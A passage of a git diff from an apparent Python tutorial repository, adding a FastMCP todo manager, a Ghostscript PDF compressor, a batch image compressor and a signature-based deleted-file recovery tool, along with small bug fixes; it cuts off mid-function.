+ base_url=args.base_url,
+ model=args.model
+ )
+
+ results = analyzer.analyze_multiple_urls(args.urls, args.timeout)
+
+ if args.export:
+ analyzer.export_results(results, args.export)
+
+ except ValueError as e:
+ print(f"Error: {e}")
+ return 1
+ except KeyboardInterrupt:
+ print("\nAnalysis interrupted by user")
+ return 1
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/ethical-hacking/http-security-headers/requirements.txt b/ethical-hacking/http-security-headers/requirements.txt
new file mode 100644
index 00000000..f0dd0aec
--- /dev/null
+++ b/ethical-hacking/http-security-headers/requirements.txt
@@ -0,0 +1 @@
+openai
\ No newline at end of file
diff --git a/general/fastmcp-mcp-client-server-todo-manager/README.md b/general/fastmcp-mcp-client-server-todo-manager/README.md
new file mode 100644
index 00000000..dd988428
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/README.md
@@ -0,0 +1,39 @@
+# Build a real MCP client and server in Python with FastMCP (Todo Manager example)
+
+This folder contains the code that accompanies the article:
+
+- Article: https://www.thepythoncode.com/article/fastmcp-mcp-client-server-todo-manager
+
+What’s included
+- `todo_server.py`: FastMCP MCP server exposing tools, resources, and a prompt for a Todo Manager.
+- `todo_client_test.py`: A small client script that connects to the server and exercises all features.
+- `requirements.txt`: Python dependencies for this tutorial.
+
+Quick start
+1) Install requirements
+```bash
+python -m venv .venv && source .venv/bin/activate # or use your preferred env manager
+pip install -r requirements.txt
+```
+
+2) Run the server (stdio transport by default)
+```bash
+python todo_server.py
+```
+
+3) In a separate terminal, run the client
+```bash
+python todo_client_test.py
+```
+
+Optional: run the server over HTTP
+- In `todo_server.py`, replace the last line with:
+```python
+mcp.run(transport="http", host="127.0.0.1", port=8000)
+```
+- Then change the client constructor to `Client("http://127.0.0.1:8000/mcp")`.
+
+Notes
+- Requires Python 3.10+.
+- The example uses in-memory storage for simplicity.
+- For production tips (HTTPS, auth, containerization), see the article.
diff --git a/general/fastmcp-mcp-client-server-todo-manager/requirements.txt b/general/fastmcp-mcp-client-server-todo-manager/requirements.txt
new file mode 100644
index 00000000..2c9387f7
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/requirements.txt
@@ -0,0 +1 @@
+fastmcp>=2.12
\ No newline at end of file
diff --git a/general/fastmcp-mcp-client-server-todo-manager/todo_client_test.py b/general/fastmcp-mcp-client-server-todo-manager/todo_client_test.py
new file mode 100644
index 00000000..f01a1e78
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/todo_client_test.py
@@ -0,0 +1,50 @@
+import asyncio
+from fastmcp import Client
+
+async def main():
+ # Option A: Connect to local Python script (stdio)
+ client = Client("todo_server.py")
+
+ # Option B: In-memory (for tests)
+ # from todo_server import mcp
+ # client = Client(mcp)
+
+ async with client:
+ await client.ping()
+ print("[OK] Connected")
+
+ # Create a few todos
+ t1 = await client.call_tool("create_todo", {"title": "Write README", "priority": "high"})
+ t2 = await client.call_tool("create_todo", {"title": "Refactor utils", "description": "Split helpers into modules"})
+ t3 = await client.call_tool("create_todo", {"title": "Add tests", "priority": "low"})
+ print("Created IDs:", t1.data["id"], t2.data["id"], t3.data["id"])
+
+ # List open
+ open_list = await client.call_tool("list_todos", {"status": "open"})
+ print("Open IDs:", [t["id"] for t in open_list.data["items"]])
+
+ # Complete one
+ updated = await client.call_tool("complete_todo", {"todo_id": t2.data["id"]})
+ print("Completed:", updated.data["id"], "status:", updated.data["status"])
+
+ # Search
+ found = await client.call_tool("search_todos", {"query": "readme"})
+ print("Search 'readme':", [t["id"] for t in found.data["items"]])
+
+ # Resources
+ stats = await client.read_resource("stats://todos")
+ print("Stats:", getattr(stats[0], "text", None) or stats[0])
+
+ todo2 = await client.read_resource(f"todo://{t2.data['id']}")
+ print("todo://{id}:", getattr(todo2[0], "text", None) or todo2[0])
+
+ # Prompt
+ prompt_msgs = await client.get_prompt("suggest_next_action", {"pending": 2, "project": "MCP tutorial"})
+ msgs_pretty = [
+ {"role": m.role, "content": getattr(m, "content", None) or getattr(m, "text", None)}
+ for m in getattr(prompt_msgs, "messages", [])
+ ]
+ print("Prompt messages:", msgs_pretty)
+
+if __name__ == "__main__":
+ asyncio.run(main())
diff --git a/general/fastmcp-mcp-client-server-todo-manager/todo_server.py b/general/fastmcp-mcp-client-server-todo-manager/todo_server.py
new file mode 100644
index 00000000..64f99b73
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/todo_server.py
@@ -0,0 +1,88 @@
+from typing import Literal
+from itertools import count
+from datetime import datetime, timezone
+from fastmcp import FastMCP
+
+# In-memory storage for demo purposes
+TODOS: list[dict] = []
+_id = count(start=1)
+
+mcp = FastMCP(name="Todo Manager")
+
+@mcp.tool
+def create_todo(
+ title: str,
+ description: str = "",
+ priority: Literal["low", "medium", "high"] = "medium",
+) -> dict:
+ """Create a todo (id, title, status, priority, timestamps)."""
+ todo = {
+ "id": next(_id),
+ "title": title,
+ "description": description,
+ "priority": priority,
+ "status": "open",
+ "created_at": datetime.now(timezone.utc).isoformat(),
+ "completed_at": None,
+ }
+ TODOS.append(todo)
+ return todo
+
+@mcp.tool
+def list_todos(status: Literal["open", "done", "all"] = "open") -> dict:
+ """List todos by status ('open' | 'done' | 'all')."""
+ if status == "all":
+ items = TODOS
+ elif status == "open":
+ items = [t for t in TODOS if t["status"] == "open"]
+ else:
+ items = [t for t in TODOS if t["status"] == "done"]
+ return {"items": items}
+
+@mcp.tool
+def complete_todo(todo_id: int) -> dict:
+ """Mark a todo as done."""
+ for t in TODOS:
+ if t["id"] == todo_id:
+ t["status"] = "done"
+ t["completed_at"] = datetime.now(timezone.utc).isoformat()
+ return t
+ raise ValueError(f"Todo {todo_id} not found")
+
+@mcp.tool
+def search_todos(query: str) -> dict:
+ """Case-insensitive search in title/description."""
+ q = query.lower().strip()
+ items = [t for t in TODOS if q in t["title"].lower() or q in t["description"].lower()]
+ return {"items": items}
+
+# Read-only resources
+@mcp.resource("stats://todos")
+def todo_stats() -> dict:
+ """Aggregated stats: total, open, done."""
+ total = len(TODOS)
+ open_count = sum(1 for t in TODOS if t["status"] == "open")
+ done_count = total - open_count
+ return {"total": total, "open": open_count, "done": done_count}
+
+@mcp.resource("todo://{id}")
+def get_todo(id: int) -> dict:
+ """Fetch a single todo by id."""
+ for t in TODOS:
+ if t["id"] == id:
+ return t
+ raise ValueError(f"Todo {id} not found")
+
+# A reusable prompt
+@mcp.prompt
+def suggest_next_action(pending: int, project: str | None = None) -> str:
+ """Render a small instruction for an LLM to propose next action."""
+ base = f"You have {pending} pending TODOs. "
+ if project:
+ base += f"They relate to the project '{project}'. "
+ base += "Suggest the most impactful next action in one short sentence."
+ return base
+
+if __name__ == "__main__":
+ # Default transport is stdio; you can also use transport="http", host=..., port=...
+ mcp.run()
diff --git a/general/interactive-weather-plot/interactive_weather_plot.py b/general/interactive-weather-plot/interactive_weather_plot.py
index b4d17141..3d1ea566 100644
--- a/general/interactive-weather-plot/interactive_weather_plot.py
+++ b/general/interactive-weather-plot/interactive_weather_plot.py
@@ -68,7 +68,7 @@ def changeLocation(newLocation):
# Making the Radio Buttons
buttons = RadioButtons(
ax=plt.axes([0.1, 0.1, 0.2, 0.2]),
- labels=locations.keys()
+ labels=list(locations.keys())
)
# Connect click event on the buttons to the function that changes location.
@@ -86,4 +86,4 @@ def changeLocation(newLocation):
plt.savefig('file.svg', format='svg')
-plt.show()
\ No newline at end of file
+plt.show()
diff --git a/gui-programming/rich-text-editor/rich_text_editor.py b/gui-programming/rich-text-editor/rich_text_editor.py
index 10c14263..05259905 100644
--- a/gui-programming/rich-text-editor/rich_text_editor.py
+++ b/gui-programming/rich-text-editor/rich_text_editor.py
@@ -112,9 +112,9 @@ def fileManager(event=None, action=None):
document['tags'][tagName] = []
ranges = textArea.tag_ranges(tagName)
-
- for i, tagRange in enumerate(ranges[::2]):
- document['tags'][tagName].append([str(tagRange), str(ranges[i+1])])
+
+ for i in range(0, len(ranges), 2):
+ document['tags'][tagName].append([str(ranges[i]), str(ranges[i + 1])])
if not filePath:
# ask the user for a filename with the native file explorer.
diff --git a/handling-pdf-files/pdf-compressor/README.md b/handling-pdf-files/pdf-compressor/README.md
index 4527174c..307f105c 100644
--- a/handling-pdf-files/pdf-compressor/README.md
+++ b/handling-pdf-files/pdf-compressor/README.md
@@ -1,8 +1,48 @@
# [How to Compress PDF Files in Python](https://www.thepythoncode.com/article/compress-pdf-files-in-python)
-To run this:
-- `pip3 install -r requirements.txt`
-- To compress `bert-paper.pdf` file:
- ```
- $ python pdf_compressor.py bert-paper.pdf bert-paper-min.pdf
- ```
- This will spawn a new compressed PDF file under the name `bert-paper-min.pdf`.
+
+This directory contains two approaches:
+
+- Legacy (commercial): `pdf_compressor.py` uses PDFTron/PDFNet. PDFNet now requires a license key and the old pip package is not freely available, so this may not work without a license.
+- Recommended (open source): `pdf_compressor_ghostscript.py` uses Ghostscript to compress PDFs.
+
+## Ghostscript method (recommended)
+
+Prerequisite: Install Ghostscript
+
+- macOS (Homebrew):
+ - `brew install ghostscript`
+- Ubuntu/Debian:
+ - `sudo apt-get update && sudo apt-get install -y ghostscript`
+- Windows:
+ - Download and install from https://ghostscript.com/releases/
+ - Ensure `gswin64c.exe` (or `gswin32c.exe`) is in your PATH.
+
+No Python packages are required for this method, only Ghostscript.
+
+### Usage
+
+To compress `bert-paper.pdf` into `bert-paper-min.pdf` with default quality (`power=2`):
+
+```
+python pdf_compressor_ghostscript.py bert-paper.pdf bert-paper-min.pdf
+```
+
+Optional quality level `[power]` controls compression/quality tradeoff (maps to Ghostscript `-dPDFSETTINGS`):
+
+- 0 = `/screen` (smallest, lowest quality)
+- 1 = `/ebook` (good quality)
+- 2 = `/printer` (high quality) [default]
+- 3 = `/prepress` (very high quality)
+- 4 = `/default` (Ghostscript default)
+
+Example:
+
+```
+python pdf_compressor_ghostscript.py bert-paper.pdf bert-paper-min.pdf 1
+```
+
+In testing, `bert-paper.pdf` (~757 KB) compressed to ~407 KB with `power=1`.
+
+## Legacy PDFNet method (requires license)
+
+If you have a valid license and the PDFNet SDK installed, you can use the original `pdf_compressor.py` script. Note that the previously referenced `PDFNetPython3` pip package is not freely available and may not install via pip. Refer to the vendor's documentation for installation and licensing.
\ No newline at end of file
diff --git a/handling-pdf-files/pdf-compressor/pdf_compressor_ghostscript.py b/handling-pdf-files/pdf-compressor/pdf_compressor_ghostscript.py
new file mode 100644
index 00000000..88de4062
--- /dev/null
+++ b/handling-pdf-files/pdf-compressor/pdf_compressor_ghostscript.py
@@ -0,0 +1,103 @@
+import os
+import sys
+import subprocess
+import shutil
+
+
+def get_size_format(b, factor=1024, suffix="B"):
+ for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
+ if b < factor:
+ return f"{b:.2f}{unit}{suffix}"
+ b /= factor
+ return f"{b:.2f}Y{suffix}"
+
+
+def find_ghostscript_executable():
+ candidates = [
+ shutil.which('gs'),
+ shutil.which('gswin64c'),
+ shutil.which('gswin32c'),
+ ]
+ for c in candidates:
+ if c:
+ return c
+ return None
+
+
+def compress_file(input_file: str, output_file: str, power: int = 2):
+ """Compress PDF using Ghostscript.
+
+ power:
+ 0 -> /screen (lowest quality, highest compression)
+ 1 -> /ebook (good quality)
+ 2 -> /printer (high quality) [default]
+ 3 -> /prepress (very high quality)
+ 4 -> /default (Ghostscript default)
+ """
+ if not os.path.exists(input_file):
+ raise FileNotFoundError(f"Input file not found: {input_file}")
+ if not output_file:
+ output_file = input_file
+
+ initial_size = os.path.getsize(input_file)
+
+ gs = find_ghostscript_executable()
+ if not gs:
+ raise RuntimeError(
+ "Ghostscript not found. Install it and ensure 'gs' (Linux/macOS) "
+ "or 'gswin64c'/'gswin32c' (Windows) is in PATH."
+ )
+
+ settings_map = {
+ 0: '/screen',
+ 1: '/ebook',
+ 2: '/printer',
+ 3: '/prepress',
+ 4: '/default',
+ }
+ pdfsettings = settings_map.get(power, '/printer')
+
+ cmd = [
+ gs,
+ '-sDEVICE=pdfwrite',
+ '-dCompatibilityLevel=1.4',
+ f'-dPDFSETTINGS={pdfsettings}',
+ '-dNOPAUSE',
+ '-dBATCH',
+ '-dQUIET',
+ f'-sOutputFile={output_file}',
+ input_file,
+ ]
+
+ try:
+ subprocess.run(cmd, check=True)
+ except subprocess.CalledProcessError as e:
+ print(f"Ghostscript failed: {e}")
+ return False
+
+ compressed_size = os.path.getsize(output_file)
+ ratio = 1 - (compressed_size / initial_size)
+ summary = {
+ "Input File": input_file,
+ "Initial Size": get_size_format(initial_size),
+ "Output File": output_file,
+ "Compressed Size": get_size_format(compressed_size),
+ "Compression Ratio": f"{ratio:.3%}",
+ }
+
+ print("## Summary ########################################################")
+ for k, v in summary.items():
+ print(f"{k}: {v}")
+ print("###################################################################")
+ return True
+
+
+if __name__ == '__main__':
+ if len(sys.argv) < 3:
+ print("Usage: python pdf_compressor_ghostscript.py [power 0-4]")
+ sys.exit(1)
+ input_file = sys.argv[1]
+ output_file = sys.argv[2]
+ power = int(sys.argv[3]) if len(sys.argv) > 3 else 2
+ ok = compress_file(input_file, output_file, power)
+ sys.exit(0 if ok else 2)
\ No newline at end of file
diff --git a/handling-pdf-files/pdf-compressor/requirements.txt b/handling-pdf-files/pdf-compressor/requirements.txt
index 0a664a86..9f6e5337 100644
--- a/handling-pdf-files/pdf-compressor/requirements.txt
+++ b/handling-pdf-files/pdf-compressor/requirements.txt
@@ -1 +1,7 @@
-PDFNetPython3==8.1.0
\ No newline at end of file
+# No Python dependencies required for Ghostscript-based compressor.
+# System dependency: Ghostscript
+# - macOS: brew install ghostscript
+# - Debian: sudo apt-get install -y ghostscript
+# - Windows: https://ghostscript.com/releases/
+#
+# The legacy script (pdf_compressor.py) depends on PDFNet (commercial) and a license key.
\ No newline at end of file
diff --git a/images/codingfleet-banner-2.png b/images/codingfleet-banner-2.png
new file mode 100644
index 00000000..e95c4d27
Binary files /dev/null and b/images/codingfleet-banner-2.png differ
diff --git a/images/codingfleet-banner-3.png b/images/codingfleet-banner-3.png
new file mode 100644
index 00000000..9f27495e
Binary files /dev/null and b/images/codingfleet-banner-3.png differ
diff --git a/python-for-multimedia/compress-image/README.md b/python-for-multimedia/compress-image/README.md
index 32f51450..919414cc 100644
--- a/python-for-multimedia/compress-image/README.md
+++ b/python-for-multimedia/compress-image/README.md
@@ -1,4 +1,56 @@
-# [How to Compress Images in Python](https://www.thepythoncode.com/article/compress-images-in-python)
-To run this:
-- `pip3 install -r requirements.txt`
-- `python compress_image.py --help`
\ No newline at end of file
+# Compress Image
+
+Advanced Image Compressor with Batch Processing
+
+This script provides advanced image compression and resizing features using Python and Pillow.
+
+## Features
+
+- Batch processing of multiple images or directories
+- Lossy and lossless compression (PNG/WebP)
+- Optional JPEG conversion
+- Resize by ratio or explicit dimensions
+- Preserve or strip metadata (EXIF)
+- Custom output directory
+- Progress bar using `tqdm`
+- Detailed logging
+
+## Requirements
+
+- Python 3.6+
+- [Pillow](https://pypi.org/project/Pillow/)
+- [tqdm](https://pypi.org/project/tqdm/)
+
+Install dependencies:
+
+```bash
+pip install pillow tqdm
+```
+
+## Usage
+
+```bash
+python compress_image.py [options] [ ...]
+```
+
+## Options
+- `-o`, `--output-dir`: Output directory (default: same as input)
+- `-q`, `--quality`: Compression quality (0-100, default: 85)
+- `-r`, `--resize-ratio`: Resize ratio (0-1, default: 1.0)
+- `-w`, `--width`: Output width (requires `--height`)
+- `-hh`, `--height`: Output height (requires `--width`)
+- `-j`, `--to-jpg`: Convert output to JPEG
+- `-m`, `--no-metadata`: Strip metadata (default: preserve)
+- `-l`, `--lossless`: Use lossless compression (PNG/WEBP)
+
+## Examples
+
+```bash
+python compress_image.py image.jpg -r 0.5 -q 80 -j
+python compress_image.py images/ -o output/ -m
+python compress_image.py image.png -l
+```
+
+## License
+
+MIT License.
diff --git a/python-for-multimedia/compress-image/compress_image.py b/python-for-multimedia/compress-image/compress_image.py
index 6560b887..f1696aa0 100644
--- a/python-for-multimedia/compress-image/compress_image.py
+++ b/python-for-multimedia/compress-image/compress_image.py
@@ -1,88 +1,104 @@
import os
from PIL import Image
+import argparse
+import logging
+from tqdm import tqdm
+# Configure logging
+logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
+logger = logging.getLogger(__name__)
def get_size_format(b, factor=1024, suffix="B"):
- """
- Scale bytes to its proper byte format
- e.g:
- 1253656 => '1.20MB'
- 1253656678 => '1.17GB'
- """
+ """Scale bytes to its proper byte format."""
for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
if b < factor:
return f"{b:.2f}{unit}{suffix}"
b /= factor
return f"{b:.2f}Y{suffix}"
-
-
-def compress_img(image_name, new_size_ratio=0.9, quality=90, width=None, height=None, to_jpg=True):
- # load the image to memory
- img = Image.open(image_name)
- # print the original image shape
- print("[*] Image shape:", img.size)
- # get the original image size in bytes
- image_size = os.path.getsize(image_name)
- # print the size before compression/resizing
- print("[*] Size before compression:", get_size_format(image_size))
- if new_size_ratio < 1.0:
- # if resizing ratio is below 1.0, then multiply width & height with this ratio to reduce image size
- img = img.resize((int(img.size[0] * new_size_ratio), int(img.size[1] * new_size_ratio)), Image.LANCZOS)
- # print new image shape
- print("[+] New Image shape:", img.size)
- elif width and height:
- # if width and height are set, resize with them instead
- img = img.resize((width, height), Image.LANCZOS)
- # print new image shape
- print("[+] New Image shape:", img.size)
- # split the filename and extension
- filename, ext = os.path.splitext(image_name)
- # make new filename appending _compressed to the original file name
- if to_jpg:
- # change the extension to JPEG
- new_filename = f"{filename}_compressed.jpg"
- else:
- # retain the same extension of the original image
- new_filename = f"{filename}_compressed{ext}"
+def compress_image(
+ input_path,
+ output_dir=None,
+ quality=85,
+ resize_ratio=1.0,
+ width=None,
+ height=None,
+ to_jpg=False,
+ preserve_metadata=True,
+ lossless=False,
+):
+ """Compress an image with advanced options."""
try:
- # save the image with the corresponding quality and optimize set to True
- img.save(new_filename, quality=quality, optimize=True)
- except OSError:
- # convert the image to RGB mode first
- img = img.convert("RGB")
- # save the image with the corresponding quality and optimize set to True
- img.save(new_filename, quality=quality, optimize=True)
- print("[+] New file saved:", new_filename)
- # get the new image size in bytes
- new_image_size = os.path.getsize(new_filename)
- # print the new size in a good format
- print("[+] Size after compression:", get_size_format(new_image_size))
- # calculate the saving bytes
- saving_diff = new_image_size - image_size
- # print the saving percentage
- print(f"[+] Image size change: {saving_diff/image_size*100:.2f}% of the original image size.")
-
-
+ img = Image.open(input_path)
+ logger.info(f"[*] Processing: {os.path.basename(input_path)}")
+ logger.info(f"[*] Original size: {get_size_format(os.path.getsize(input_path))}")
+
+ # Resize if needed
+ if resize_ratio < 1.0:
+ new_size = (int(img.size[0] * resize_ratio), int(img.size[1] * resize_ratio))
+ img = img.resize(new_size, Image.LANCZOS)
+ logger.info(f"[+] Resized to: {new_size}")
+ elif width and height:
+ img = img.resize((width, height), Image.LANCZOS)
+ logger.info(f"[+] Resized to: {width}x{height}")
+
+ # Prepare output path
+ filename, ext = os.path.splitext(os.path.basename(input_path))
+ output_ext = ".jpg" if to_jpg else ext
+ output_filename = f"{filename}_compressed{output_ext}"
+ output_path = os.path.join(output_dir or os.path.dirname(input_path), output_filename)
+
+ # Save with options
+ save_kwargs = {"quality": quality, "optimize": True}
+ if not preserve_metadata:
+ save_kwargs["exif"] = b"" # Strip metadata
+ if lossless and ext.lower() in (".png", ".webp"):
+ save_kwargs["lossless"] = True
+
+ try:
+ img.save(output_path, **save_kwargs)
+ except OSError:
+ img = img.convert("RGB")
+ img.save(output_path, **save_kwargs)
+
+ logger.info(f"[+] Saved to: {output_path}")
+ logger.info(f"[+] New size: {get_size_format(os.path.getsize(output_path))}")
+ except Exception as e:
+ logger.error(f"[!] Error processing {input_path}: {e}")
+
+def batch_compress(
+ input_paths,
+ output_dir=None,
+ quality=85,
+ resize_ratio=1.0,
+ width=None,
+ height=None,
+ to_jpg=False,
+ preserve_metadata=True,
+ lossless=False,
+):
+ """Compress multiple images."""
+ if output_dir and not os.path.exists(output_dir):
+ os.makedirs(output_dir, exist_ok=True)
+ for path in tqdm(input_paths, desc="Compressing images"):
+ compress_image(path, output_dir, quality, resize_ratio, width, height, to_jpg, preserve_metadata, lossless)
+
if __name__ == "__main__":
- import argparse
- parser = argparse.ArgumentParser(description="Simple Python script for compressing and resizing images")
- parser.add_argument("image", help="Target image to compress and/or resize")
- parser.add_argument("-j", "--to-jpg", action="store_true", help="Whether to convert the image to the JPEG format")
- parser.add_argument("-q", "--quality", type=int, help="Quality ranging from a minimum of 0 (worst) to a maximum of 95 (best). Default is 90", default=90)
- parser.add_argument("-r", "--resize-ratio", type=float, help="Resizing ratio from 0 to 1, setting to 0.5 will multiply width & height of the image by 0.5. Default is 1.0", default=1.0)
- parser.add_argument("-w", "--width", type=int, help="The new width image, make sure to set it with the `height` parameter")
- parser.add_argument("-hh", "--height", type=int, help="The new height for the image, make sure to set it with the `width` parameter")
+ parser = argparse.ArgumentParser(description="Advanced Image Compressor with Batch Processing")
+ parser.add_argument("input", nargs='+', help="Input image(s) or directory")
+ parser.add_argument("-o", "--output-dir", help="Output directory (default: same as input)")
+ parser.add_argument("-q", "--quality", type=int, default=85, help="Compression quality (0-100)")
+ parser.add_argument("-r", "--resize-ratio", type=float, default=1.0, help="Resize ratio (0-1)")
+ parser.add_argument("-w", "--width", type=int, help="Output width (requires --height)")
+ parser.add_argument("-hh", "--height", type=int, help="Output height (requires --width)")
+ parser.add_argument("-j", "--to-jpg", action="store_true", help="Convert output to JPEG")
+ parser.add_argument("-m", "--no-metadata", action="store_false", help="Strip metadata")
+ parser.add_argument("-l", "--lossless", action="store_true", help="Use lossless compression (PNG/WEBP)")
+
args = parser.parse_args()
- # print the passed arguments
- print("="*50)
- print("[*] Image:", args.image)
- print("[*] To JPEG:", args.to_jpg)
- print("[*] Quality:", args.quality)
- print("[*] Resizing ratio:", args.resize_ratio)
- if args.width and args.height:
- print("[*] Width:", args.width)
- print("[*] Height:", args.height)
- print("="*50)
- # compress the image
- compress_img(args.image, args.resize_ratio, args.quality, args.width, args.height, args.to_jpg)
\ No newline at end of file
+ input_paths = []
+ for path in args.input:
+ if os.path.isdir(path): input_paths.extend(os.path.join(path, f) for f in os.listdir(path) if f.lower().endswith((".jpg",".jpeg",".png",".webp")))
+ else: input_paths.append(path)
+ if not input_paths: logger.error("No valid images found!"); exit(1)
+ batch_compress(input_paths, args.output_dir, args.quality, args.resize_ratio, args.width, args.height, args.to_jpg, args.no_metadata, args.lossless)
diff --git a/python-for-multimedia/recover-deleted-files/README.md b/python-for-multimedia/recover-deleted-files/README.md
new file mode 100644
index 00000000..9b57b100
--- /dev/null
+++ b/python-for-multimedia/recover-deleted-files/README.md
@@ -0,0 +1 @@
+# [How to Recover Deleted Files with Python](https://thepythoncode.com/article/how-to-recover-deleted-file-with-python)
\ No newline at end of file
diff --git a/python-for-multimedia/recover-deleted-files/file_recovery.py b/python-for-multimedia/recover-deleted-files/file_recovery.py
new file mode 100644
index 00000000..057995c4
--- /dev/null
+++ b/python-for-multimedia/recover-deleted-files/file_recovery.py
@@ -0,0 +1,552 @@
+
+import os
+import sys
+import argparse
+import struct
+import time
+import logging
+import subprocess
+import signal
+from datetime import datetime, timedelta
+from pathlib import Path
+import binascii
+
+# File signatures (magic numbers) for common file types
+FILE_SIGNATURES = {
+ 'jpg': [bytes([0xFF, 0xD8, 0xFF, 0xE0]), bytes([0xFF, 0xD8, 0xFF, 0xE1])],
+ 'png': [bytes([0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A])],
+ 'gif': [bytes([0x47, 0x49, 0x46, 0x38, 0x37, 0x61]), bytes([0x47, 0x49, 0x46, 0x38, 0x39, 0x61])],
+ 'pdf': [bytes([0x25, 0x50, 0x44, 0x46])],
+ 'zip': [bytes([0x50, 0x4B, 0x03, 0x04])],
+ 'docx': [bytes([0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x06, 0x00])], # More specific signature
+ 'xlsx': [bytes([0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x06, 0x00])], # More specific signature
+ 'pptx': [bytes([0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x06, 0x00])], # More specific signature
+ 'mp3': [bytes([0x49, 0x44, 0x33])],
+ 'mp4': [bytes([0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70])],
+ 'avi': [bytes([0x52, 0x49, 0x46, 0x46])],
+}
+
+# Additional validation patterns to check after finding the signature
+# This helps reduce false positives
+VALIDATION_PATTERNS = {
+ 'docx': [b'word/', b'[Content_Types].xml'],
+ 'xlsx': [b'xl/', b'[Content_Types].xml'],
+ 'pptx': [b'ppt/', b'[Content_Types].xml'],
+ 'zip': [b'PK\x01\x02'], # Central directory header
+ 'pdf': [b'obj', b'endobj'],
+}
+
+# File endings (trailer signatures) for some file types
+FILE_TRAILERS = {
+ 'jpg': bytes([0xFF, 0xD9]),
+ 'png': bytes([0x49, 0x45, 0x4E, 0x44, 0xAE, 0x42, 0x60, 0x82]),
+ 'gif': bytes([0x00, 0x3B]),
+ 'pdf': bytes([0x25, 0x25, 0x45, 0x4F, 0x46]),
+}
+
+# Maximum file sizes to prevent recovering corrupted files
+MAX_FILE_SIZES = {
+ 'jpg': 30 * 1024 * 1024, # 30MB
+ 'png': 50 * 1024 * 1024, # 50MB
+ 'gif': 20 * 1024 * 1024, # 20MB
+ 'pdf': 100 * 1024 * 1024, # 100MB
+ 'zip': 200 * 1024 * 1024, # 200MB
+ 'docx': 50 * 1024 * 1024, # 50MB
+ 'xlsx': 50 * 1024 * 1024, # 50MB
+ 'pptx': 100 * 1024 * 1024, # 100MB
+ 'mp3': 50 * 1024 * 1024, # 50MB
+ 'mp4': 1024 * 1024 * 1024, # 1GB
+ 'avi': 1024 * 1024 * 1024, # 1GB
+}
+
+class FileRecoveryTool:
+ def __init__(self, source, output_dir, file_types=None, deep_scan=False,
+ block_size=512, log_level=logging.INFO, skip_existing=True,
+ max_scan_size=None, timeout_minutes=None):
+ """
+ Initialize the file recovery tool
+
+ Args:
+ source (str): Path to the source device or directory
+ output_dir (str): Directory to save recovered files
+ file_types (list): List of file types to recover
+ deep_scan (bool): Whether to perform a deep scan
+ block_size (int): Block size for reading data
+ log_level (int): Logging level
+ skip_existing (bool): Skip existing files in output directory
+ max_scan_size (int): Maximum number of bytes to scan
+ timeout_minutes (int): Timeout in minutes
+ """
+ self.source = source
+ self.output_dir = Path(output_dir)
+ self.file_types = file_types if file_types else list(FILE_SIGNATURES.keys())
+ self.deep_scan = deep_scan
+ self.block_size = block_size
+ self.skip_existing = skip_existing
+ self.max_scan_size = max_scan_size
+ self.timeout_minutes = timeout_minutes
+ self.timeout_reached = False
+
+ # Setup logging
+ self.setup_logging(log_level)
+
+ # Create output directory if it doesn't exist
+ self.output_dir.mkdir(parents=True, exist_ok=True)
+
+ # Statistics
+ self.stats = {
+ 'total_files_recovered': 0,
+ 'recovered_by_type': {},
+ 'start_time': time.time(),
+ 'bytes_scanned': 0,
+ 'false_positives': 0
+ }
+
+ for file_type in self.file_types:
+ self.stats['recovered_by_type'][file_type] = 0
+
+ def setup_logging(self, log_level):
+ """Set up logging configuration"""
+ logging.basicConfig(
+ level=log_level,
+ format='%(asctime)s - %(levelname)s - %(message)s',
+ handlers=[
+ logging.StreamHandler(),
+ logging.FileHandler(f"recovery_{datetime.now().strftime('%Y%m%d_%H%M%S')}.log")
+ ]
+ )
+ self.logger = logging.getLogger('file_recovery')
+
+ def _setup_timeout(self):
+ """Set up a timeout handler"""
+ if self.timeout_minutes:
+ def timeout_handler(signum, frame):
+ self.logger.warning(f"Timeout of {self.timeout_minutes} minutes reached!")
+ self.timeout_reached = True
+
+ # Set the timeout
+ signal.signal(signal.SIGALRM, timeout_handler)
+ signal.alarm(int(self.timeout_minutes * 60))
+
+ def get_device_size(self):
+ """Get the size of the device or file"""
+ if os.path.isfile(self.source):
+ # Regular file
+ return os.path.getsize(self.source)
+ else:
+ # Block device
+ try:
+ # Try using blockdev command (Linux)
+ result = subprocess.run(['blockdev', '--getsize64', self.source],
+ capture_output=True, text=True, check=True)
+ return int(result.stdout.strip())
+ except (subprocess.SubprocessError, FileNotFoundError):
+ try:
+ # Try using ioctl (requires root)
+ import fcntl
+ with open(self.source, 'rb') as fd:
+ # BLKGETSIZE64 = 0x80081272
+ buf = bytearray(8)
+ fcntl.ioctl(fd, 0x80081272, buf)
+ return struct.unpack('L', buf)[0]
+ except:
+ # Last resort: try to seek to the end
+ try:
+ with open(self.source, 'rb') as fd:
+ fd.seek(0, 2) # Seek to end
+ return fd.tell()
+ except:
+ self.logger.warning("Could not determine device size. Using fallback size.")
+ # Fallback to a reasonable size for testing
+ return 1024 * 1024 * 1024 # 1GB
+
+ def scan_device(self):
+ """Scan the device for deleted files"""
+ self.logger.info(f"Starting scan of {self.source}")
+ self.logger.info(f"Looking for file types: {', '.join(self.file_types)}")
+
+ try:
+ # Get device size
+ device_size = self.get_device_size()
+ self.logger.info(f"Device size: {self._format_size(device_size)}")
+
+ # Set up timeout if specified
+ if self.timeout_minutes:
+ self._setup_timeout()
+ self.logger.info(f"Timeout set for {self.timeout_minutes} minutes")
+
+ with open(self.source, 'rb', buffering=0) as device: # buffering=0 for direct I/O
+ self._scan_device_data(device, device_size)
+
+ except (IOError, OSError) as e:
+ self.logger.error(f"Error accessing source: {e}")
+ return False
+
+ self._print_summary()
+ return True
+
+ def _scan_device_data(self, device, device_size):
+ """Scan the device data for file signatures"""
+ position = 0
+
+ # Limit scan size if specified
+ if self.max_scan_size and self.max_scan_size < device_size:
